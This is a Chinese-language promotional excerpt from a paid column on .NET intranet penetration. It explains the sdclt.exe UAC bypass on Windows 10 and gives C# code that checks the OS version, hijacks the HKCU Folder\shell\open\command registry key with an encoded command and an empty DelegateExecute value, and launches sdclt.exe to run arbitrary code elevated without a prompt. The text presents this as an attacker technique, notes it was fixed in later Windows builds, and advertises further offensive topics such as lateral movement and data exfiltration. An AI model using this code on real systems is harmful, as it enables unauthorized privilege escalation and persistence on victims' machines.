.NET内网实战： 通过 sdclt.exe 绕过 UAC 实现提权

阅读须知

此文所节选自小报童《.NET 内网实战攻防》专栏，主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧，对内网和后渗透感兴趣的朋友们可以订阅该电子报刊，解锁更多的报刊内容。

基本介绍

本文内容部分节选自小报童《.NET 通过 slui.exe 绕过 UAC 实现提权》，完整的文章内容请加入小报童后订阅查看。现在限时只需59元，永久买断！目前已有300+位朋友抢先预定，我们会长期更新，对.NET内网安全的朋友们请尽快订阅该报刊！

原理分析

在 Windows 内网渗透或红队演练中，绕过 UAC 是攻击者常用的提权手法之一。虽然 Windows 设计 UAC 机制来限制恶意软件执行高权限操作，但某些系统组件由于历史遗留问题，可以在不触发 UAC 提示的情况下继承高权限执行代码。

3.1 sdclt.exe

其中，sdclt.exe 作为 Windows 备份与恢复功能的一部分，因其调用 Windows Shell 处理 Foldershellopencommand 注册表项的行为，成为了 UAC 绕过的关键点。本文将深入分析 sdclt.exe 如何与注册表劫持技术结合，实现无提示 UAC 提权，并探讨其适用环境、防御措施及修复情况。

常见用法：在运行（Win + R）中输入 sdclt.exe ，或者运行命令参数

sdclt.exe /BLBBACKUPWIZARD

由于 sdclt.exe 在执行时，会尝试打开控制面板中的备份和还原界面。在这个过程中，它会调用 Windows Shell 处理文件夹的默认打开方式。究其根本原因在于 sdclt.exe 运行后，会访问 shell32.dll 的 Control_RunDLL 函数， Control_RunDLL 需要打开一个系统窗口，但在这个过程中，又会查询文件夹的默认打开方式。

3.2 编码实现

首先，访问 HKLMSoftwareMicrosoftWindows NTCurrentVersionProductName 获取 Windows 版本信息。用于检查操作系统版本，确保目标系统是 Windows 10，否则退出程序，具体代码如下所示。

RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows NT\CurrentVersion\");string text = registryKey.GetValue("ProductName").ToString();registryKey.Close();if(!text.Contains("Windows 10")){    Console.WriteLine("System is not Windows 10. This attack will fail. Exiting...");    Environment.Exit(1);}

随后，攻击者通过创建注册表项和设置默认值来触发恶意命令的执行，具体代码如下所示。

string command = Encoding.UTF8.GetString(encodedCommand);RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\Classes\",true);registryKey2.CreateSubKey("Folder\shell\open\command");RegistryKey registryKey3 = Registry.CurrentUser.OpenSubKey("Software\Classes\Folder\shell\open\command",true);registryKey3.SetValue("", command);registryKey3.SetValue("DelegateExecute","");registryKey3.Close();

设置 DelegateExecute 为 ""，该值为空时，系统会在 UAC 白名单内直接执行该命令。最后，运行 sdclt.exe，Windows 认为该程序属于受信任的系统组件，在无 UAC 提示的情况下执行 Foldershellopencommand 里的内容。

综上，sdclt.exe UAC 绕过利用了 Windows Shell 处理文件夹默认打开方式的机制，通过劫持 HKCUSoftwareClassesFoldershellopencommand，攻击者可以在不触发 UAC 的情况下，以高权限执行任意代码。这一技术在 Windows 10 低版本（1607、1703、1709）及部分 Windows Server 2016 环境中有效，微软在 Windows 10 1803 及以上版本已修复该问题。想要了解完整或者更多的内网安全方向的文章，可以移步订阅小报童《.NET 内网实战攻防》电子报刊。

欢迎加入.NET 电子报刊

我们的小报童电子报刊【.NET内网安全攻防】也开始运营，引入小报童也是为了弥补知识星球对于轻量级阅读支持的不足，为用户读者提供更佳的阅读体验。如果您对阅读体验的需求比较高，那么可以订阅这个专栏。

本次电子报刊《.NET 内网安全攻防》专栏，内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧，可细分为以下8个方向。

1） .NET 安全防御绕过2） .NET 本地权限提升3） .NET 内网信息收集4） .NET 内网代理通道5） .NET 内网横向移动6） .NET 目标权限维持7） .NET 数据传输外发8） .NET 目标痕迹清理

原价899，现在限时只需59元，永久买断！目前已有280+位朋友抢先预定，我们会长期更新，初步计划保持每周更新1-2篇新内容，对.NET内网安全的朋友们请尽快订阅该报刊！

每增加五十人涨价10元，抓紧订阅，超值！订阅后请关注公众号：dotNet安全矩阵，发送订单截图和您的微信号，邀请您加入专属交流群。感兴趣的朋友，可以点击链接：https://xiaobot.net/p/dotNetAttack，或者扫描下方海报微信二维码加入即可，订阅后小报童定时会将最新内容通过微信推送给您。